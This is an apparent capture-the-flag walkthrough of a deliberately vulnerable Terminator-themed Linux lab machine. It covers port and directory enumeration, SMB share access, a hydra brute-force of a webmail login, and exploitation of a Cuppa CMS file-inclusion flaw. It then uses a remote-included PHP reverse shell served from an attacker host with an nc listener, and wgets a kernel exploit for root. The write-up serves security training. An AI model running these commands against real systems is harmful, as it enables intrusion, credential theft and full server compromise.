#Linux #SMB #RFI
skynet: A vulnerable Terminator themed Linux machine
NMAP Scan
nmap -sV -sC -p- 10.10.14.219- To see the versions of the services running (-sV)
- To perform a script scan using the default set of scripts (-sC)
- To scan all ports from 1 through 65535 (-p-)
OPEN PORTS
- 22/tcp open ssh
- 80/tcp open http
- 110/tcp open pop3
- 139/tcp open netbios-ssn
- 143/tcp open imap
- 445/tcp open microsoft-ds (SMB)
We start with Port 80/tcp. The HTML code does not shown anything interesting, the buttons do not work.
Let's move on the 'hidden" directories, Gobuster can help us locate them:
gobuster dir -u=http://10.10.14.219 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
This analysis takes a while. The following directories were listed after the first few minutes:
- /admin (Status 301)
- /css (Status 301)
- /js (Status 301)
- /config (Status 301)
- /ai (Satus 301)
- /squirrelmail (Status 301) -- Check this out!
- /server-status
Searchsploit suggests that there is no vulnerability documented for SquirrelMail version 1.4.23
OK, Let's switch to Port 445/tcp - SMB server. We can try the enum4linux for enumerating information.
enum4linux -a 10.10.14.219- To do all simple enumerations (-a)
There are interesting results such as the known usernames:
Here are the sharenames:
We can use the smbclient to enter the anonymous share.
smbclient '\\10.10.48.162\anonymous'
# If you need to enter share with a username
smbclient -U milesdyson '\\10.10.246.55\milesdyson'
We captured a number of log files -- one of which includes a password list for the email account: milesdyson.
Let's use hydra for brute-forcing the email account
hydra -l milesdyson -P log1.txt 10.10.48.162 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=incorrect" -V -F -u
We now have access to the email account!
There is a Samba Password Reset email providing a new password. We can use the credentials to login the SMB share and see that there is a document titled important.txt. Here, it reveals an 'hidden directory'. Gobuster suggests that there is another hidden directory as /administrator, please see the figure below.
Now, let's go to searchsploit and search if there is any vulnerability documented for Cuppa CMS:
searchsploit -m php/webapps/25971.txt
#VULNERABILITY: PHP CODE INJECTION
#An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
# We basically include the following link:
/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
#so the full URL becomes:
curl http://10.10.74.120/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Now, we can work on the reverse shell:
STEP 1: Generate the Reverse Shell and save it on the local host (Here, it is called RS.php)
STEP 2: Open up an HTTP server to transfer the payload to the target machine
sudo python3 -m http.server 80STEP 3: Turn on the listener
sudo nc -lvnp 87STEP 4: Modify the PHP Injection URL:
curl http://10.10.74.120/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.18.123.93:80/RS.phpSTEP 5: Upload the PHP file from the localhost using the HTTP server and invoke the listener
Niceeee!! it works:
This picture gives an overall summary of the steps followed:
Next step is stabilizing the shell!
python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo
fg
export TERM=xtermPrivilege Escalation
Here, I followed the procedure explained in the following reference: https://ratiros01.medium.com/tryhackme-skynet-bdce0537fe7d
Step 1: Find kernel version
unama -a
Step 2: Search for kernel exploits
searchsploit linux kernel 4.8.0
searchsploit -m linux/local/43418.c
# File copied to the directory
wget http://10.18.123.93/43418.c
# Transfered to the target machine
#Commands to execute
gcc pwn.c -o pwn
./pwn
